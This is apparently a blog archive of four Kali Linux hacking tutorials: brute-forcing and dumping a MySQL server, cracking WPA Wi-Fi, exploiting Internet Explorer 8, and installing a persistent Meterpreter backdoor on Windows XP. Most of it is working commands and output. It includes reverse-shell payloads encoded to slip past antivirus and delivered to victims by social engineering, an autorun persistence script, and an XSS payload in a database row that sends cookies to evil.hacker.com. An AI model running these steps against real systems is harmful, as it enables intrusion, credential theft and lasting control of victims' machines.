Saturday 27 June 2015

Hack MySQL Server in RHEL7 using Metasploit in Kali Linux


In this tutorial, we will hack MySQL Server running in RHEL 7 using Metasploit running in Kali Linux.

MySQL Server Name: meru.mycompany.com
MySQL Server IP Address: 192.168.122.1

Perform the following steps on the Kali Linux Machine

1) Start the services.
root@kali:~# service postgresql start
[ ok ] Starting PostgreSQL 9.1 database server: main.

root@kali:~# service metasploit start
[ ok ] Starting Metasploit rpc server: prosvc.[ ok ] Starting Metasploit web server: thin.
[ ok ] Starting Metasploit worker: worker.

root@kali:~# msfconsole
msf >


2) Perform nmap scan on MySQL Server.
msf > db_nmap -sV 192.168.122.1 -p 3306
[*] Nmap: Starting Nmap 6.47 ( http://nmap.org ) at 2015-06-27 10:03 IST
[*] Nmap: Nmap scan report for meru.mycompany.com (192.168.122.1)
[*] Nmap: Host is up (0.00034s latency).
[*] Nmap: PORT     STATE SERVICE VERSION
[*] Nmap: 3306/tcp open  mysql   MySQL 5.5.35-MariaDB
[*] Nmap: MAC Address: 52:54:00:8A:8D:BA (QEMU Virtual NIC)
[*] Nmap: Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 0.71 seconds


3) Perform brute force password attack.
msf > use auxiliary/scanner/mysql/mysql_login

msf auxiliary(mysql_login) > show options

Module options (auxiliary/scanner/mysql/mysql_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             3306             yes       The target port

   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts


msf auxiliary(mysql_login) > set USER_FILE /usr/share/metasploit-framework/data/wordlists/unix_users.txt
USER_FILE => /usr/share/metasploit-framework/data/wordlists/unix_users.txt

msf auxiliary(mysql_login) > set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
PASS_FILE => /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

msf auxiliary(mysql_login) > set RHOSTS 192.168.122.1
RHOSTS => 192.168.122.1

msf auxiliary(mysql_login) > set STOP_ON_SUCCESS  true
STOP_ON_SUCCESS => true

msf auxiliary(mysql_login) > run

[*] 192.168.122.1:3306 MYSQL - Found remote MySQL version 5.5.35
Access denied for user 'anon'@'192.168.122.115' (using password: YES))[-] 192.168.122.1:3306 MYSQL - LOGIN FAILED: anon:iloveyou (Incorrect: Access denied for user 'anon'@'192.168.122.115' (using password: YES))
[-] 192.168.122.1:3306 MYSQL - LOGIN FAILED: anon:admin (Incorrect: Access denied for user 'anon'@'192.168.122.115' (using password: YES))
[+] 192.168.122.1:3306 MYSQL - Success: 'root:root'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


As seen above, we have cracked login credentials for User 'root' with password 'root'


4) Capture other user credentials. We will capture the password hashes and then crack it using John the Ripper.

msf > use auxiliary/scanner/mysql/mysql_hashdump
msf auxiliary(mysql_hashdump) > show options

Module options (auxiliary/scanner/mysql/mysql_hashdump):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password for the specified username
   RHOSTS                     yes       The target address range or CIDR identifier

   RPORT     3306             yes       The target port
   THREADS   1                yes       The number of concurrent threads
   USERNAME                   no        The username to authenticate as


msf auxiliary(mysql_hashdump) > set USERNAME root
USERNAME => root
msf auxiliary(mysql_hashdump) > set PASSWORD root
PASSWORD => root
msf auxiliary(mysql_hashdump) > run

[+] Saving HashString as Loot: root:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
[+] Saving HashString as Loot: root:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
[+] Saving HashString as Loot: root:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
[+] Saving HashString as Loot: shabbir:*8A5EC1AC3F305AF2D49B4AC632B4829A9440E667
[+] Saving HashString as Loot: user:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
[+] Saving HashString as Loot: anon@localhost:*2CE4701D02A76C12CD513109CA16967A68B4C23A
[+] Saving HashString as Loot: anon:*2CE4701D02A76C12CD513109CA16967A68B4C23A
[+] Saving HashString as Loot: anon:*2CE4701D02A76C12CD513109CA16967A68B4C23A
[+] Saving HashString as Loot: root:*01A6717B58FF5C7EAFFF6CB7C96F7428EA65FE4C
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed



Open another terminal window and copy the password hashes to a file 'temp' as shown below.
root@kali:~# vi temp

root:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
root:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
root:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
shabbir:*8A5EC1AC3F305AF2D49B4AC632B4829A9440E667
user:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
anon@localhost:*2CE4701D02A76C12CD513109CA16967A68B4C23A
anon:*2CE4701D02A76C12CD513109CA16967A68B4C23A
anon:*2CE4701D02A76C12CD513109CA16967A68B4C23A
root:*01A6717B58FF5C7EAFFF6CB7C96F7428EA65FE4C


Run John the Ripper to crack the hashes.

root@kali:~# john temp
Created directory: /root/.john
Loaded 9 password hashes with no different salts (MySQL 4.1 double-SHA-1 [128/128 SSE2 intrinsics 4x])
root             (root)
root             (root)
root             (root)
shabbir          (shabbir)
password         (user)
princess         (anon@localhost)
princess         (anon)
princess         (anon)


root@kali:~# john temp --show
root:root
root:root
root:root
shabbir:shabbir
user:password
anon@localhost:princess
anon:princess
anon:princess




5) Browse MySQL Server.

msf > use auxiliary/admin/mysql/mysql_enum 

msf auxiliary(mysql_enum) > show options

Module options (auxiliary/admin/mysql/mysql_enum):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password for the specified username
   RHOST                      yes       The target address
   RPORT     3306             yes       The target port
   USERNAME                   no        The username to authenticate as

msf auxiliary(mysql_enum) > set RHOST 192.168.122.1
RHOST => 192.168.122.1

msf auxiliary(mysql_enum) > set USERNAME root
USERNAME => root

msf auxiliary(mysql_enum) > set PASSWORD root
PASSWORD => root

msf auxiliary(mysql_enum) > run

[*] Running MySQL Enumerator...
[*] Enumerating Parameters
[*]     MySQL Version: 5.5.35-MariaDB
[*]     Compiled for the following OS: Linux
[*]     Architecture: x86_64
[*]     Server Hostname: meru.mycompany.com
[*]     Data Directory: /var/lib/mysql/
[*]     Logging of queries and logins: OFF
[*]     Old Password Hashing Algorithm OFF
[*]     Loading of local files: ON
[*]     Logins with old Pre-4.1 Passwords: OFF
[*]     Allow Use of symlinks for Database Files: DISABLED
[*]     Allow Table Merge:
[*]     SSL Connection: DISABLED
[*] Enumerating Accounts:
[*]     List of Accounts with Password Hashes:
[*]         User: root Host: localhost Password Hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
[-] *** auxiliary/admin/mysql/mysql_enum is still calling the deprecated report_auth_info method! This needs to be updated!
[*]         User: root Host: 127.0.0.1 Password Hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
[-] *** auxiliary/admin/mysql/mysql_enum is still calling the deprecated report_auth_info method! This needs to be updated!
[*]         User: root Host: ::1 Password Hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
[-] *** auxiliary/admin/mysql/mysql_enum is still calling the deprecated report_auth_info method! This needs to be updated!
[*]         User: shabbir Host: % Password Hash: *8A5EC1AC3F305AF2D49B4AC632B4829A9440E667
[-] *** auxiliary/admin/mysql/mysql_enum is still calling the deprecated report_auth_info method! This needs to be updated!
[*]         User: user Host: localhost Password Hash: *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
[-] *** auxiliary/admin/mysql/mysql_enum is still calling the deprecated report_auth_info method! This needs to be updated!
[*]         User: anon@localhost Host: % Password Hash: *2CE4701D02A76C12CD513109CA16967A68B4C23A
[-] *** auxiliary/admin/mysql/mysql_enum is still calling the deprecated report_auth_info method! This needs to be updated!
[*]         User: anon Host: localhost Password Hash: *2CE4701D02A76C12CD513109CA16967A68B4C23A
[-] *** auxiliary/admin/mysql/mysql_enum is still calling the deprecated report_auth_info method! This needs to be updated!
[*]         User: anon Host: 192.168.122.% Password Hash: *2CE4701D02A76C12CD513109CA16967A68B4C23A
[-] *** auxiliary/admin/mysql/mysql_enum is still calling the deprecated report_auth_info method! This needs to be updated!
[*]         User: root Host: % Password Hash: *01A6717B58FF5C7EAFFF6CB7C96F7428EA65FE4C
[-] *** auxiliary/admin/mysql/mysql_enum is still calling the deprecated report_auth_info method! This needs to be updated!
[*]     The following users have GRANT Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: ::1
[*]     The following users have CREATE USER Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: ::1
[*]         User: root Host: %
[*]     The following users have RELOAD Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: ::1
[*]         User: root Host: %
[*]     The following users have SHUTDOWN Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: ::1
[*]         User: root Host: %
[*]     The following users have SUPER Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: ::1
[*]         User: root Host: %
[*]     The following users have FILE Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: ::1
[*]         User: root Host: %
[*]     The following users have PROCESS Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: ::1
[*]         User: root Host: %
[*]     The following accounts have privileges to the mysql database:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: ::1
[*]         User: root Host: %
[*]     The following accounts are not restricted by source:
[*]         User: anon@localhost Host: %
[*]         User: root Host: %
[*]         User: shabbir Host: %
[*] Auxiliary module execution completed


6) View MySQL Server Database Schema.

msf > info auxiliary/scanner/mysql/mysql_schemadump

       Name: MYSQL Schema Dump
     Module: auxiliary/scanner/mysql/mysql_schemadump
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  theLightCosine <theLightCosine@metasploit.com>

Basic options:
  Name             Current Setting  Required  Description
  ----             ---------------  --------  -----------
  DISPLAY_RESULTS  true             yes       Display the Results to the Screen
  PASSWORD                          no        The password for the specified username
  RHOSTS                            yes       The target address range or CIDR identifier
  RPORT            3306             yes       The target port
  THREADS          1                yes       The number of concurrent threads
  USERNAME                          no        The username to authenticate as

Description:
  This module extracts the schema information from a MySQL DB server.

msf > use auxiliary/scanner/mysql/mysql_schemadump 

msf auxiliary(mysql_schemadump) > set USERNAME shabbir
USERNAME => shabbir
msf auxiliary(mysql_schemadump) > set PASSWORD shabbir
PASSWORD => shabbir

msf auxiliary(mysql_schemadump) > set RHOSTS 192.168.122.1
RHOSTS => 192.168.122.1

msf auxiliary(mysql_schemadump) > run

[*] Schema stored in: /root/.msf4/loot/20150627113706_default_192.168.122.1_mysql_schema_138881.txt
[+] MySQL Server Schema
 Host: 192.168.122.1
 Port: 3306
 ====================

---
- DBName: mybank
  Tables:
  - TableName: customer
    Columns:
    - ColumnName: loginid
      ColumnType: varchar(50)
    - ColumnName: passwd
      ColumnType: varchar(50)
    - ColumnName: custname
      ColumnType: varchar(100)
    - ColumnName: accountno
      ColumnType: int(11)
    - ColumnName: balance
      ColumnType: decimal(10,2)
    - ColumnName: address
      ColumnType: varchar(500)
    - ColumnName: mobile
      ColumnType: varchar(50)

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed



7) Run SQL Query

msf auxiliary(mysql_enum) > use auxiliary/admin/mysql/mysql_sql

msf auxiliary(mysql_sql) > show options

Module options (auxiliary/admin/mysql/mysql_sql):

   Name      Current Setting   Required  Description
   ----      ---------------   --------  -----------
   PASSWORD                    no        The password for the specified username
   RHOST                       yes       The target address
   RPORT     3306              yes       The target port
   SQL       select version()  yes       The SQL to execute.
   USERNAME                    no        The username to authenticate as

msf auxiliary(mysql_sql) > set RHOST 192.168.122.1 
RHOST => 192.168.122.1

msf auxiliary(mysql_sql) > set username shabbir
username => shabbir


msf auxiliary(mysql_sql) > set password shabbir
password => shabbir


msf auxiliary(mysql_sql) > set sql select * from mybank.customer
sql => select * from mybank.customer
 

msf auxiliary(mysql_sql) > run

[*] Sending statement: 'select * from mybank.customer'...
[*]  | batul | dahod | batul ben dahod | 1234 | 25000.00 | fdfdfdfdfd | 5454545454 |
[*]  | shabbir | shabbir | shabbir rangwala | 1000 | 49000.00 | dkdkdkdkd dkdkdkdkd | 193933030 |
[*]  | taher | taher | taher saifee | 2000 | 8000.00 | dddl fkfkfl flflflfll | 122222233 |
[*]  | trudy | trudy | trudy chennai | 1050 | 20000.00 | <a href=# onclick="document.location='http://evil.hacker.com/xss.php?c='+escape(document.cookie);"My Address</a> | 2345678531 |
[*] Auxiliary module execution completed



Thursday 25 June 2015

Install Backdoor in Windows XP using Metasploit in Kali Linux


We have the following scenario:

Victim (Windows XP Machine) IP Address:  192.168.1.2

Attacker (Kali Linux Machine)     IP Address:  192.168.1.3

We will use Social Engineering Toolkit in Kali Linux to generate a malicious executable payload that, when made to run at the Windows XP machine,will get the attacker complete access of the victim's machine. Then the attacker will use Metasploit to install a permanent backdoor on the victim machine.

We will perform the following steps:
1) Create malicious payload
2) Give the payload to the Victim.
3) Create listener (for the payload) on the Attacker on port 443.
4) When the user executes the payload, the Victim connects to the Attacker on port 443.
5) Escalate privilege to Windows user SYSTEM.
6) Install backdoor on the Victim.
7) Create listener (for the backdoor) on the Attacker on port 80.
8) Whenever the Victim boots, it automatically connects to the Attacker.

Perform the following steps on the Attacker (Kali Linux) Machine:

1) Create malicious executable payload.
1.1) Start Social Engineering Toolkit.
root@kali:~# setoolkit

1.2) Select option 1) Social Engineering Attacks
set> 1

1.3) Select option   4) Create a Payload and Listener
set> 4
set:payloads> Enter the IP address for the payload (reverse):192.168.1.3

What payload do you want to generate:

  Name:                                       Description:

   1) Windows Shell Reverse_TCP               Spawn a command shell on victim and send back to attacker
   2) Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker
   3) Windows Reverse_TCP VNC DLL             Spawn a VNC server on victim and send back to attacker
   4) Windows Bind Shell                      Execute payload and create an accepting port on remote system

set:payloads>2

Select one of the below, 'backdoored executable' is typically the best. However,
most still get picked up by AV. You may need to do additional packing/crypting
in order to get around basic AV detection.

   1) shikata_ga_nai
   2) No Encoding
   3) Multi-Encoder
   4) Backdoored Executable

set:encoding>1
set:payloads> PORT of the listener [443]:
[-] Encoding the payload 4 times. [-]

[*] x86/shikata_ga_nai succeeded with size 314 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 341 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 368 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 395 (iteration=4)

[*] Your payload is now in the root directory of SET as payload.exe
[-] The payload can be found in the SET home directory.
set> Start the listener now? [yes|no]: no


2) We need to send this payload file  /usr/share/set/payload.exe to the Victim using social media, e-mail, uploading at a server, or any other type of choice.


3) Set up a handler on the Attacker machine using Metasploit.
3.1) Start the services.
root@kali:~# service postgresql start
[ ok ] Starting PostgreSQL 9.1 database server: main.

root@kali:~# service metasploit start
[ ok ] Starting Metasploit rpc server: prosvc.[ ok ] Starting Metasploit web server: thin.
[ ok ] Starting Metasploit worker: worker.

3.2) Start metasploit console.
root@kali:~# msfconsole
msf >

3.3) Select exploit.
msf > use exploit/multi/handler
 
3.4) Select payload.
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

3.5) View options
msf exploit(handler) > show options
Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

3.6) Set options
msf exploit(handler) > set LHOST 192.168.1.3
LHOST => 192.168.1.3
msf exploit(handler) > set LPORT 443
LPORT => 443

3.7) Execute exploit
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.3:443
[*] Starting the payload handler...


4) As soon as the victim runs the executable file, the payload will make a connection to the attacker system, giving the attacker complete control of the victim machine.
 
[*] Sending stage (769536 bytes) to 192.168.1.2
[*] Meterpreter session 1 opened (192.168.1.3:443 -> 192.168.1.2:1038) at 2015-06-25 06:52:57 +0530

meterpreter > sysinfo
Computer        : WINSETU
OS              : Windows XP (Build 2600, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter >

5) Escalate privilege

meterpreter > getuid
Server username: WINSETU\shabbir

meterpreter > getsystem
...got system (via technique 1).

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM


6) Install backdoor on the victim machine.

meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

    -A        Automatically start a matching multi/handler to connect to the agent
    -L <opt>  Location in target host where to write payload to, if none %TEMP% will be used.
    -P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp.
    -S        Automatically start the agent on boot as a service (with SYSTEM privileges)
    -T <opt>  Alternate executable template to use
    -U        Automatically start the agent when the User logs on
    -X        Automatically start the agent when the system boots
    -h        This help menu
    -i <opt>  The interval in seconds between each connection attempt
    -p <opt>  The port on the remote host where Metasploit is listening
    -r <opt>  The IP of the system running Metasploit listening for the connect back


meterpreter > run persistence -X -i 10 -p 80 -r 192.168.1.3
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WINSETU_20150625.1651/WINSETU_20150625.1651.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=80
[*] Persistent agent script is 148439 bytes long
[+] Persistent Script written to C:\DOCUME~1\shabbir\LOCALS~1\Temp\RXdYyZmSEBJVd.vbs
[*] Executing script C:\DOCUME~1\shabbir\LOCALS~1\Temp\RXdYyZmSEBJVd.vbs
[+] Agent executed with PID 3648
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\YHxeQVYtYjmIYu
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\YHxeQVYtYjmIYu
meterpreter >


7) Install handler for the backdoor on the Attacker machine listening on port 80.
meterpreter > background
[*] Backgrounding session 1...

msf exploit(handler) > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.1.3
LHOST => 192.168.1.3

msf exploit(handler) > set LPORT 80
LPORT => 80

msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.3:80
[*] Starting the payload handler...


8) Now, whenever the victim machine boots, it will automatically connect to the Attacker machine on port 80.
[*] Sending stage (769536 bytes) to 192.168.1.2[*]
 Meterpreter session 2 opened (192.168.1.3:80 -> 192.168.1.2:1051) at 2015-06-25 07:19:35 +0530

meterpreter >


Monday 22 June 2015

Hack WPA/WPA2 Wi-Fi with aircrack-ng in Kali Linux.


In this tutorial, we use 'aircrack-ng' in Kali Linux to crack a WPA wifi network. 

Perform the following steps on the Kali Linux machine.

1) Disconnect from all wireless networks.

2) Verify that your wireless card supports monitor mode.
root@kali:~# airmon-ng

Interface    Chipset        Driver

wlan0        Atheros AR9285    ath9k - [phy0]

If your wireless card is not listed above, then it does not support monitor mode and you cannot continue. 

3) Enable Monitor mode
root@kali:~# airmon-ng start wlan0
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e
PID    Name
2550    NetworkManager
2658    wpa_supplicant


Interface    Chipset        Driver

wlan0        Atheros AR9285    ath9k - [phy0]
                (monitor mode enabled on mon0)

Note the name of the new monitor interface, mon0

4) Disable wireless card from connecting to the internet, allowing it to focus on monitor mode instead.
root@kali:~# ifconfig wlan0 down

5) List all the wireless networks in range.
root@kali:~# airodump-ng mon0
                                                                                                                                                     BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                                   
 54:B8:0A:89:76:4E  -33       16       10    4   1  54e  WPA  TKIP   PSK SHABBIR                                                                  
 94:D7:23:0C:09:20  -77       20       51    0  11  54e  WPA  CCMP   PSK  MTNL                                                                     
 9C:D6:43:CC:04:B8  -80       11        0    0   2  54e. WPA2 CCMP   PSK  dlink                                                                    
 10:7B:EF:A6:26:80  -80        3        0    0  11  54e  WPA2 CCMP   PSK  TATA                                                                     

Locate your network. Press Ctrl+C to stop the process. And note down the BSSID and CH (channel).


6) Monitor only the target network and wait for a device to connect to the network and then capture the four-way handshake.
root@kali:~# airodump-ng -c 1 --bssid 54:B8:0A:89:76:4E -w Desktop/wpa mon0

Where,
-c 1 -> channel of network is 1 (as seen in the previous output)
--bssid 54:B8:0A:89:76:4E -> BSSID copied from the previous output (The MAC address of the Access Point).
-w Desktop/wpa -> file name where the handshake will be saved.
mon0 -> the monitor interface


7) What we are really doing now is waiting for a device to connect to the network, so that we can capture the four-way handshake which we need in order to crack the password. Also, four files will show up on your desktop. This is where the handshake will be saved.

When a device connects to the network, the following message appears on the airodump screen "WPA handshake:  54:B8:0A:89:76:4E" as shown below:                                     

 CH  1 ][ Elapsed: 32 s ][ 2015-06-22 09:56 ][ WPA handshake: 54:B8:0A:89:76:4E                                        
                                                                                                                                                    
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                                    
 54:B8:0A:89:76:4E  -29   1      314        6    0   1  54e  WPA  TKIP   PSK  SHABBIR                                                               
                                                                                                                                                    
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                          
                                                                                                                                                    
 54:B8:0A:89:76:4E  0C:EE:E6:C0:37:43  -26    1e-54      0        9                                                       


The handshake has been captured. Press Ctrl+C on the airodump terminal to stop monitoring the network.

8) Launch the process of cracking the password. However, it will only crack it if the password happens to be in the wordlist  that you have selected.
root@kali:~# aircrack-ng -a2 -b 54:B8:0A:89:76:4E -w /usr/share/wordlists/fern-wifi/common.txt Desktop/*.cap

Opening Desktop/wpa-04.cap
Reading packets, please wait...

                                 Aircrack-ng 1.2 beta3


                   [00:00:00] 4 keys tested (254.57 k/s)


                         KEY FOUND! [ goodadmin ]


      Master Key     : 9A CD 12 5D 29 22 11 C7 6A 3D 75 0D 9D A7 76 C1
                       F1 2A 9B 9A 57 DD A9 EA 11 26 B0 EB 40 09 1E EB

      Transient Key  : 5A 15 F5 AD 5A F6 1F 00 78 F5 5F 0F 87 46 8C 81
                       DA 1F B4 8B 7C B2 C9 24 4B 63 6D EF 64 88 30 67
                       66 E4 5E 30 5E 4C C1 E1 F5 47 8A 7F AE F0 A6 FB
                       BF 7B 9E A6 AB ED B6 1B 43 15 43 D1 EF 6E C2 49

      EAPOL HMAC     : 79 56 57 C1 85 7D D8 A4 CD 89 B3 34 A5 36 D0 77


Where,
-a is the method used to crack the handshake. 2=WPA method
-b is the BSSID of the target access point
-w is the path to  the wordlist
Desktop/*.cap is the path to the .cap file captured in the handshake.


9) After completing the hack, disable mon0, and  enable wlan0 to be able to connect to the Internet.

root@kali:~# ifconfig mon0 down
root@kali:~# ifconfig wlan0 up





 

Sunday 21 June 2015

Hack Windows 7 by using Kali Linux


In this tutorial, we will exploit "Internet Explorer CSS recursive call memory corrruption" vulnerability in Internet Explorer 8 in Windows 7 Service Pack 1 (unpatched) using Metasploit in Kali Linux and get a remote shell on the Windows 7 machine.

We have the  following configuration: Windows 7 IP Address: 192.168.122.10
Kali Linux IP Address: 192.168.122.115

Perform the following steps on the Kali Linux Machine

1) Start the services.
root@kali:~# service postgresql start
[ ok ] Starting PostgreSQL 9.1 database server: main.

root@kali:~# service metasploit start
[ ok ] Starting Metasploit rpc server: prosvc.[ ok ] Starting Metasploit web server: thin.
[ ok ] Starting Metasploit worker: worker.


2) Start metasploit console.
root@kali:~# msfconsole
msf >

3) Select exploit.
msf > use exploit/windows/browser/ms11_003_ie_css_import

4) Select payload. 
msf exploit(ms11_003_ie_css_import) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp


5) View options.
msf exploit(ms11_003_ie_css_import) > show options

Module options (exploit/windows/browser/ms11_003_ie_css_import):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   OBFUSCATE  true             no        Enable JavaScript obfuscation
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.

   SSL        false            no        Negotiate SSL for incoming connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                     no        The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic


6) Set options
msf exploit(ms11_003_ie_css_import) > set URIPATH /
URIPATH => /
msf exploit(ms11_003_ie_css_import) > set LHOST 192.168.122.115
LHOST => 192.168.122.115

7) Execute the exploit.
msf exploit(ms11_003_ie_css_import) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.122.115:4444
msf exploit(ms11_003_ie_css_import) > [*] Using URL: http://0.0.0.0:8080/
[*]  Local IP: http://192.168.122.115:8080/
[*] Server started.


8) User clicks on the malicious URL. As we can see, a link has been generated as a result of the exploit command. This is the malicious link http://192.168.122.115:8080/ that we will have to send to our target, so that it can exploit their browser.

When the user clicks on the malicious link, the browser will try to load the page, but nothing will be displayed. But you will get a remote shell on your msfconsole, as shown below.

[*] 192.168.122.10   ms11_003_ie_css_import - Received request for "/"
[*] 192.168.122.10   ms11_003_ie_css_import - Sending redirect
[*] 192.168.122.10   ms11_003_ie_css_import - Received request for "/iPKMV.html"
[*] 192.168.122.10   ms11_003_ie_css_import - Sending HTML
[*] 192.168.122.10   ms11_003_ie_css_import - Received request for "/generic-1434889455.dll"
[*] 192.168.122.10   ms11_003_ie_css_import - Sending .NET DLL
[*] 192.168.122.10   ms11_003_ie_css_import - Received request for "/favicon.ico"
[*] 192.168.122.10   ms11_003_ie_css_import - Sending CSS
[*] 192.168.122.10   ms11_003_ie_css_import - Received request for "/\xEE\x80\xA0\xE1\x81\x9A\xEE\x80\xA0\xE1\x81\x9A\xEE\x80\xA0\xE1\x81\x9A\xEE\x80\xA0\xE1\x81\x9A"
[*] 192.168.122.10   ms11_003_ie_css_import - Sending CSS
[*] Sending stage (770048 bytes) to 192.168.122.10
[*] Session ID 1 (192.168.122.115:4444 -> 192.168.122.10:49219) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2744)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3376
[*] 192.168.122.10   ms11_003_ie_css_import - Received request for "/generic-1434889455.dll"
[*] 192.168.122.10   ms11_003_ie_css_import - Sending .NET DLL
[*] Sending stage (770048 bytes) to 192.168.122.10
[*] 192.168.122.10   ms11_003_ie_css_import - Received request for "/favicon.ico"
[*] 192.168.122.10   ms11_003_ie_css_import - Sending CSS
[+] Successfully migrated to process
[*] Session ID 2 (192.168.122.115:4444 -> 192.168.122.10:49221) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3404)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3532
[*] 192.168.122.10   ms11_003_ie_css_import - Received request for "/generic-1434889455.dll"
[*] 192.168.122.10   ms11_003_ie_css_import - Sending .NET DLL
[*] Sending stage (770048 bytes) to 192.168.122.10
[+] Successfully migrated to process
[*] Session ID 3 (192.168.122.115:4444 -> 192.168.122.10:49224) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3664)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3808
[*] 192.168.122.10   ms11_003_ie_css_import - Received request for "/generic-1434889455.dll"
[*] 192.168.122.10   ms11_003_ie_css_import - Sending .NET DLL
[*] Sending stage (770048 bytes) to 192.168.122.10
[+] Successfully migrated to process
[*] Session ID 4 (192.168.122.115:4444 -> 192.168.122.10:49226) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3848)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3984
[+] Successfully migrated to process

As we can see above, the InitialAutoRunScript executes a migrate -f command which migrates the payload from iexplorer.exe to notepad.exe. This step is essential for a persistent connectivity. Even if the user closes the browser, still the conection will be alive as we have migrated to another process.

9) View the sessions.
msf exploit(ms11_003_ie_css_import) > sessions -i

Active sessions
===============

  Id  Type                   Information                  Connection
  --  ----                   -----------                  ----------
